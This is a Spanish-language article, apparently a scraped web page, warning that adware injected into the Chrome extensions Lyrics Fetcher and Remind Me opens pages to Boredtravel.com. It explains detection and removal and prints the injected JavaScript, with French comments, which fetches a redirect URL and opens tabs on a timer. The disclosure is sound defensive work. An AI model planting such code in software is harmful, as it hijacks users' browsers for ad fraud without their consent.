Un adware que abre ventanas emergentes a Boredtravel.com se ha deslizado en algunas extensiones de Chrome. Aqu\u00ed se explica c\u00f3mo detectar y eliminar este virus.<\/p>\n\n\n\n\n\n
Se ha insertado un script malicioso en la \u00faltima actualizaci\u00f3n de varias extensiones de Chrome. Este script abre el sitio Boredtravel.com sin el conocimiento de los usuarios, a intervalos regulares de tiempo. Las extensiones infectadas por este script son Lyrics Fetcher y Remind Me, del \u00fatil desarrollador webwebtech.<\/p>\n\n\n\n
Este adware no es peligroso, ya que solo abre una p\u00e1gina publicitaria. Sin embargo, es inquietante dejar que ocurra esta dudosa pr\u00e1ctica.<\/p>\n\n\n\n
Para identificar el adware, simplemente analice el comportamiento de su navegador:<\/p>\n\n\n\n
La eliminaci\u00f3n es simple y r\u00e1pida:<\/p>\n\n\n\n
Se han identificado casos para extensiones Letra de Fetcher<\/a> y Recu\u00e9rdame<\/a>, pero pueden no ser los \u00fanicos. Es posible que el adware tambi\u00e9n est\u00e9 presente en la extensi\u00f3n Modo beb\u00e9<\/a>, una extensi\u00f3n del mismo desarrollador. <\/p>\n\n\n\n No est\u00e1 claro si el desarrollador de esta extensi\u00f3n agreg\u00f3 deliberadamente el script malicioso, o si fue realizado por un hacker. Como precauci\u00f3n, le recomendamos que deshabilite o elimine todas las extensiones de este desarrollador. <\/p>\n\n\n\n Las extensiones han sido reportadas a Google, sabremos m\u00e1s pronto. Si otras extensiones tienen la misma preocupaci\u00f3n, no dude en hac\u00e9rnoslo saber.<\/p>\n\n\n\n Aqu\u00ed hay algunas extensiones alternativas:<\/p>\n\n\n\n El principio es simple, el desarrollador o un hacker ha agregado un script en las extensiones en cuesti\u00f3n. Este script, que se ejecuta en segundo plano, indica al navegador que abra una p\u00e1gina publicitaria a intervalos regulares. El objetivo para el desarrollador o hacker es que la p\u00e1gina de destino se abra varias veces. Esto permite aumentar el n\u00famero de visitas del sitio Boredtravel.com y aumentar los ingresos relacionados.<\/p>\n\n\n\n Aqu\u00ed est\u00e1 el c\u00f3digo que se ha agregado en la extensi\u00f3n. Agregu\u00e9 comentarios verdes para que entiendas mejor<\/p>\n\n\nReemplazar extensiones<\/h3>\n\n\n\n
El trabajo de Boredtravel.com<\/h2>\n\n\n\n
\n<script>\n\n\n\/\/ fonction qui ouvre un pop-up 6 minutes apr\u00e8s le d\u00e9marrage de Chrome\n setTimeout(function () { \n $.ajax({\n url: "https:\/\/demo7530752.mockable.io\/url",\n \/* cette URL g\u00e9n\u00e8re un lien du type\n https:\/\/ourshort.com\/?g\/BNHzHJJ *\/\n async: false,\n dataType: 'json',\n success: function (data) {\n\n \/\/ouverture du lien g\u00e9n\u00e9r\u00e9, qui redirige ensuite vers Boredtravel.com\n var newURL = data.msg;\n chrome.tabs.create({ url: newURL }); ;\n intervalWebsite() \/* appel de la fonction qui ouvre\n un pop-up toutes les 4 heures *\/\n }\n });\n }, 6 * 60 * 1000) \/\/ 6 x 60 x 1000 millisecondes = 6 min\n\n\n\/\/ fonction qui ouvre un pop-up toutes les 4 heures\n function intervalWebsite() {\n setInterval(function () {\n $.ajax({\n url: "https:\/\/demo7530752.mockable.io\/url",\n \/\/ comme dans la premi\u00e8re fonction\n async: false,\n dataType: 'json',\n success: function (data) {\n\n \/\/ comme dans la premi\u00e8re fonction\n var newURL = data.msg;\n chrome.tabs.create({ url: newURL }); ;\n\n }\n });\n }, 240 * 60 * 1000)\/\/ 240 x 60 x 1000 millisecondes = 240 min = 4h\n }\n\n\n<\/script>\n<\/pre><\/div>\n\n\n